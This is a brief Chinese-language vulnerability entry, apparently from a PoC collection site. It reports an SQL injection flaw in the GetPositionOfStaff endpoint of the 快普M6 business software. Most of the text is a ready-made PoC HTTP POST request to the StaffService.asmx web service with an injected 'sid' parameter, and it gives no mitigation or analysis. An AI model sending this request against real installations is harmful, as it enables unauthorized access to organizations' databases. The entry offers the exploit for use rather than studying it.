快普M6 GetPositionOfStaff存在SQL注入漏洞

日期: 2025-09-01 | 影响软件: 快普M6 | POC: 已公开

漏洞描述

快普M6 GetPositionOfStaff 存在SQL注入漏洞

PoC代码

POST /WebService/StaffService.asmx/GetPositionOfStaff HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

sid=-1/user

相关漏洞推荐